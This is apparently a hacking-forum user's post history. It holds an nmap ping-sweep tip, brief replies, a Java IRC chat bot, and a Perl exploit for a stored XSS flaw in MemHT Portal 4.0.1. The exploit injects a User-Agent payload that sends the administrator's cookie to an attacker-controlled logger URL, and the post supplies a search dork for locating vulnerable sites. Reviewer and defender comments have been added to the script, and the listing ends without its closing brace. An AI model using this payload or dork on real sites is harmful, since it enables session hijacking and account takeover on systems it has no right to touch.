

Messages - ZonTa

1
Tutorials / Re: [Tutorial] Portscanning Fun
« on: December 24, 2011, 03:25:00 pm »
You can write all the IPs to a list file and then run:

kulverstukas@kulverstukas-desktop:~$ nmap -sP -iL ~/ips.list

Starting Nmap 5.00 ( http://nmap.org ) at 2011-12-24 15:26 EET
Host bru01m01-in-f105.1e100.net (209.85.147.105) is up (0.067s latency).
Host ir1.fp.vip.mud.yahoo.com (209.191.122.70) is up (0.17s latency).
Host xvm-100-57.ghst.net (173.246.100.57) is up (0.14s latency).
Nmap done: 3 IP addresses (3 hosts up) scanned in 2.80 seconds

-sP tells nmap to do nothing else but ping the hosts (host discovery only, no port scan).
-iL tells it to scan all the IPs in the given list file, ips.list in my case.

Most new routers and cameras don't respond to ICMP, so a ping scan can report them as down even though they are online.

2
Tutorials / Re: HTTP Splitting
« on: April 14, 2011, 03:45:40 am »
So when we do the Cache Poisoning , it works for all clients ??

3
Tutorials / Re: Linux (Web)server security
« on: April 14, 2011, 03:30:40 am »
It wasn't finished when u posted in opensc a long time ago :\

4
I wrote this. I reported it to the vendor and he gave me a positive reply. hehe  :)

http://www.exploit-db.com/exploits/15623/

#!/usr/bin/perl
# MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]
# by ZonTa - zontahackers[at]gmail[dot]com
#
# After successful inject wait for the admin to view statistic page.
# Fix is available : http://www.memht.com/news_149_MemHT-Portal-4-0-2.html
# Dork : intext:"MemHT Portal is a free software released under the GNU/GPL License by Miltenovik Manojlo"

use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;

# Positional arguments, in the order given by the usage text: target host/path,
# user id, username, password, and the host/path of the logging page.
my ($host,$id,$username,$password,$logger) = @ARGV;
 
my $http = new LWP::UserAgent;
# The User-Agent header value is the stored-XSS payload. Per the header comment
# the markup runs when the admin views the statistics page, i.e. the portal
# stores this header and later renders it without HTML-encoding. The BODY
# ONLOAD handler sends document.cookie to $logger and redirects to $host.
# NOTE(review): the leading `]"</td></tr>` presumably closes the markup that
# surrounds the value on that page; the portal's template is not shown here.
# Defender notes: HTML-encode stored request headers on output, mark session
# cookies HttpOnly, and treat HTML tokens in logged User-Agent values as an
# indicator. The header comment points to MemHT Portal 4.0.2 as the fix.
my $u_agent = "]\"</td></tr><BODY ONLOAD=document.location=\"http://$logger?cookie=\"+document.cookie+\"&redirect=http://$host\">";
# Session cookie built as login_user=<id>#md5(username)#md5(password). An
# unsalted MD5 of the password inside the cookie makes a stolen cookie
# password-equivalent, so cookie theft is not limited to one session.
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);

# Named subs are compiled before this statement runs, so the call may precede
# the definition further down the file.
Main::Exploit();

package Main;

# Entry point: prints the usage text unless exactly five command-line
# arguments were supplied; otherwise sets the User-Agent header on the shared
# client and performs the authenticated request.
sub Exploit
{
    unless (@ARGV == 5) {
        return Main::Usage();
    }

    HTTP::UserAgent($u_agent);
    return MemHT::Login();
}

# Prints the banner and command-line help, and returns the result of print.
sub Usage {
    my $help_text = <<EOF;
+-------------------------------------------------------------------+
| MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability  |
+-------------------------[user agent]------------------------------+

by ZonTa - zontahackers[at]gmail[dot]com
 
Usage: perl exploit.pl host/path userId user pass logger[OPTIONS]

host: target host and memht path
userId: user id
user: valid username
pass: valid password
logger: PHP loging file
 
Example:
perl exploit.pl localhost/memht 2 foo secret 192.168.1.5/logger.php

Download Logger.php -> http://pastebin.com/K6E9AWrC

EOF

    return print $help_text;
}

package MemHT;
       
# Attaches the session cookie to the shared client, requests the private
# message page and reports the outcome. The only check is whether the
# response body contains "access denied" (case-insensitive); on a match the
# script prints a failure message and exits.
sub Login
{
    HTTP::Cookies($cookies);
    my $page = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');

    if ($page->content =~ /access denied/i) {
        print "Login Failed!\n";
        exit;
    }

    print "Logged In!\n";
    print "XSS injected !";
}

package HTTP;

# Sets the User-Agent header on the shared LWP client and returns whatever
# the client's agent() call returns.
sub UserAgent
{
    my ($agent_string) = @_;
    return $http->agent($agent_string);
}

# Installs the given string as the default Cookie header, so every request
# made through the shared client carries it.
sub Cookies
{
    my ($cookie_value) = @_;
    return $http->default_header('Cookie' => $cookie_value);
}
 
# Issues a GET request through the shared client. The argument is used as-is
# when it already starts with "http://" (case-insensitive); otherwise that
# scheme is prepended. Returns the response object.
sub GET
{
    my ($url) = @_;
    $url = 'http://'.$url unless $url =~ m{^http://(.+?)$}i;
    return $http->get($url);
}
     
# Issues a POST request (without form data) through the shared client. The
# argument is used as-is when it already starts with "http://"
# (case-insensitive); otherwise that scheme is prepended. Returns the
# response object.
sub POST
{
    my ($url) = @_;
    $url = 'http://'.$url unless $url =~ m{^http://(.+?)$}i;
    return $http->post($url);
}
     
# Passes its first argument to the shared client's default_header() and
# returns the result. Nothing in this listing calls it.
# NOTE(review): this copy of the listing ends without the sub's closing brace.
sub http_header
{
    return $http->default_header($_[0]);


# Greetz to Sri Lankans 

5
Hardware / Re: Make your old flash drive bootable!
« on: November 27, 2010, 05:23:20 am »
Do you have a solution for a computer that doesn't have USB boot? That computer has 2 USB ports but it doesn't have a USB boot option.

6
Scripting Languages / Java IRC Bot
« on: November 25, 2010, 06:51:24 pm »
I was going to make an AI bot , and ended up with this. lol :P

/**
 *
 * @author ZonTa
 */
import java.io.*;
import java.util.*;
import java.net.Socket;


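/**
 * Small IRC bot: connects to one server, joins one channel and answers a few
 * fixed phrases. Every line read from the socket is untrusted input, so the
 * handlers index into it defensively and the operator command is restricted
 * to the configured owner.
 */
public class JBot implements Runnable {

   Random generator = new Random();
   // Random 0-99 suffix that the constructor appends to the nick.
   int r = generator.nextInt(100);

   private String server;
   private int port;
   private String channel;
   private String nick, user, name, owner;

   protected void server(String server) {
      this.server = server;
   }

   protected String server() {
      return this.server;
   }

   protected void port(int port) {
      this.port = port;
   }

   protected void channel(String channel) {
      this.channel = channel;
   }

   protected String channel() {
      return this.channel;
   }

   protected int port() {
      return this.port;
   }

   protected void nick(String nick) {
      this.nick = nick;
   }

   protected String nick() {
      return this.nick;
   }

   protected void user(String user) {
      this.user = user;
   }

   protected String user() {
      return this.user;
   }

   protected void name(String name) {
      this.name = name;
   }

   protected String name() {
      return this.name;
   }

   protected void owner(String owner) {
      this.owner = owner;
   }

   protected String owner() {
      return this.owner;
   }

   // True while the reader loop in run() should keep going.
   private boolean isActive;

   protected void isActive(boolean bool) {
      this.isActive = bool;
   }

   protected boolean isActive() {
      return this.isActive;
   }

   /** Creates a bot with the built-in defaults and connects it. */
   public static void main(String args[]) {
      System.out.println("Starting program.");
      try {
         new JBot().start();
      } catch (java.io.IOException e) {
         // Report the failure instead of swallowing it silently.
         System.err.println("Could not connect: " + e.getMessage());
      }
   }

   /**
    * Credits to whoever wrote it.
    * The AI KnowledgeBase for the bot: each row is {trigger, reply}.
    * Replies use tabs instead of spaces because they are sent as a single
    * PRIVMSG parameter without the ':' trailing-parameter prefix.
    */
   static String[][] KnowledgeBase = {
      {"HELLO",
       "Hello!."
      },

      {"WHAT IS YOUR NAME",
       "MY\tNAME\tIS\tJ-BOT."
      },

      {"HI",
       "HI\tTHERE!",
      },

      {"HOW ARE YOU",
       "I'M\tDOING\tFINE!"
      },

      {"WHO ARE YOU",
       "I'M\tAN\tA.I\tPROGRAM."
      },

      {"ARE YOU INTELLIGENT",
       "YES,OFCORSE."
      },

      {"ARE YOU REAL",
       "DOES\tTHAT\tQUESTION\tREALLY\tMATERS\tTO\tYOU?"
      }
   };

   /**
    * Looks up a reply for the given message text.
    *
    * @param str message text, compared case-insensitively with each trigger
    * @return the matching reply, or "" when no trigger matches
    */
   static String findMatch(String str) {
      String result = "";
      for (int i = 0; i < KnowledgeBase.length; ++i) {
         if (KnowledgeBase[i][0].equalsIgnoreCase(str)) {
            result = KnowledgeBase[i][1];
            break;
         }
      }
      return result;
   }

   /** Writes one raw protocol line to the server and flushes it. */
   protected void sayIt(String str) throws IOException {
      out.write(str);
      out.flush();
   }

   /**
    * Extracts the message text from a raw line by splitting on ':'.
    *
    * @return the third ':'-separated field, or "" when there are fewer
    */
   static String getMsg(String str) {
      String[] items = str.split(":");
      if (items.length > 2)
         return items[2];
      else
         return "";
   }

   /**
    * Returns the part of the line before the first '!' with every ':'
    * removed; for a prefixed line such as ":nick!user@host ..." that is
    * the sender's nick.
    */
   protected String getUser(String user) {
      String[] items = user.split("!");
      return items[0].replace(":", "");
   }

   /** Fills in the built-in server, channel and identity defaults. */
   protected JBot() {
      System.out.println("Initializing.");
      this.server("irc.evilzone.org");
      this.port(6667);
      this.nick("jBOT-" + r);
      this.user("jBOT");
      this.name("jBOT");
      this.channel("#evilzone");
      this.owner("Owner");
   }

   private Socket socket;
   private BufferedReader in;
   private BufferedWriter out;

   /**
    * Connects, registers, joins the channel and then starts the reader
    * thread.
    *
    * @throws java.io.IOException if the connection or the first writes fail
    */
   protected void start() throws java.io.IOException {
      this.socket = new Socket(this.server(), this.port());
      this.in = new BufferedReader(new InputStreamReader(socket.getInputStream()));
      this.out = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
      if (socket.isConnected()) {
         out.write("NICK " + this.nick() + "\r\n");
         out.write("USER " + this.user() + " \"\" \"\" :" + this.name() + "\r\n");
         out.write("JOIN " + this.channel() + " 456\r\n");
         out.flush();

         // Start the reader only after the handshake has been flushed, so
         // two threads never write to the unsynchronized writer at once.
         this.isActive(true);
         System.out.println("Starting thread.");
         new Thread(this).start();
      }
   }

   /**
    * Reader loop: greets the channel, then handles server lines until the
    * stream ends, an I/O error occurs or the bot is deactivated.
    */
   public void run() {
      try {
         sayIt("PRIVMSG " + this.channel() + " Greetingz!\r\n");
      } catch (IOException ex) {
         System.out.println("Could not send greeting: " + ex.getMessage());
      }

      try {
         String buffer;
         while (this.isActive() && (buffer = in.readLine()) != null) {
            System.out.println(buffer);
            handleLine(buffer);
         }
      } catch (java.io.IOException e) {
         e.printStackTrace();
      } finally {
         // End of stream or a broken connection is final; stopping here
         // avoids spinning on a dead socket.
         this.isActive(false);
         closeQuietly();
      }
   }

   /** Applies every trigger to one raw line received from the server. */
   private void handleLine(String buffer) throws IOException {
      String sResponse = findMatch(getMsg(buffer));
      if (sResponse.length() != 0) {
         sayIt("PRIVMSG " + this.channel() + " " + sResponse + "\r\n");
      }

      if (buffer.startsWith("PING")) {
         // A bare "PING" has no payload; substring(5) would throw on it.
         String payload = buffer.length() > 5 ? buffer.substring(5) : "";
         sayIt("PONG " + payload + "\r\n");
      }

      if (buffer.contains("GiveOP")) {
         // Granting operator status is privileged, so only the configured
         // owner may trigger it. A nick match is only as strong as the
         // network's nick registration.
         String sender = getUser(buffer);
         if (sender.equalsIgnoreCase(this.owner())) {
            String[] usr = buffer.split(" ");
            // The target nick is the fifth token; fall back to the owner
            // when it is absent.
            String target = usr.length > 4 ? usr[4] : this.owner();
            sayIt("MODE " + this.channel() + " +o " + target + "\r\n");
         } else {
            System.out.println("Ignoring GiveOP from non-owner: " + sender);
         }
      }

      if (buffer.contains("kiss")) {
         sayIt("PRIVMSG " + this.channel() + " :* :* :* \r\n");
      }

      if (buffer.contains("thank") || buffer.contains("Thank")) {
         sayIt("PRIVMSG " + this.channel() + " You\tare\twelcome\t" + getUser(buffer) + "!\r\n");
      }

      if (buffer.contains("KICK " + this.channel() + " " + this.nick())) {
         sayIt("JOIN " + this.channel() + " 456 \r\n");
         sayIt("PRIVMSG " + this.channel() + " \u0002You\tcan't\tkick\tme! \r\n");
      }

      if (buffer.contains("JOIN :" + this.channel()) && !buffer.contains(this.nick)) {
         sayIt("PRIVMSG " + this.channel() + " Welcome\t" + getUser(buffer) + " \r\n");
      }
   }

   /** Closes the socket, if one was opened, ignoring close errors. */
   private void closeQuietly() {
      if (this.socket != null) {
         try {
            this.socket.close();
         } catch (IOException ignored) {
            // Nothing useful can be done if close itself fails.
         }
      }
   }
}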
